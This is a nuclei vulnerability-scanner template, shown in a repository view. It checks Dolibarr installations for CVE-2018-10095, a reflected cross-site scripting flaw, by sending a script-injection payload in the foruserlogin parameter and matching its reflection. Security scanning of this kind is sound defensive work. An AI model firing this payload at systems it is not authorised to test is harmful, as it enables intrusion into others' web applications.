nuclei-templates/cves/2018/CVE-2018-10095.yaml

32 lines
923 B
YAML
Raw Normal View History

2021-07-27 08:49:19 +00:00
id: CVE-2018-10095
info:
name: Dolibarr before 7.0.2 allows XSS.
author: pikpikcu
severity: medium
description: |
Cross-site scripting (XSS) vulnerability in Dolibarr before 7.0.2 allows remote attackers to inject arbitrary web script or HTML via the foruserlogin parameter to adherents/cartes/carte.php.
reference: https://nvd.nist.gov/vuln/detail/CVE-2018-10095
tags: cve,cve2018,xss,dolibarr
requests:
- method: GET
path:
2021-08-02 17:01:01 +00:00
- "{{BaseURL}}/dolibarr/adherents/cartes/carte.php?&mode=cardlogin&foruserlogin=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&model=5160&optioncss=print"
2021-07-27 08:49:19 +00:00
matchers-condition: and
matchers:
- type: word
words:
2021-08-02 17:01:01 +00:00
- '</script><script>alert(document.domain)</script>'
2021-07-27 08:49:19 +00:00
part: body
- type: status
status:
- 200
- type: word
part: header
words:
- text/html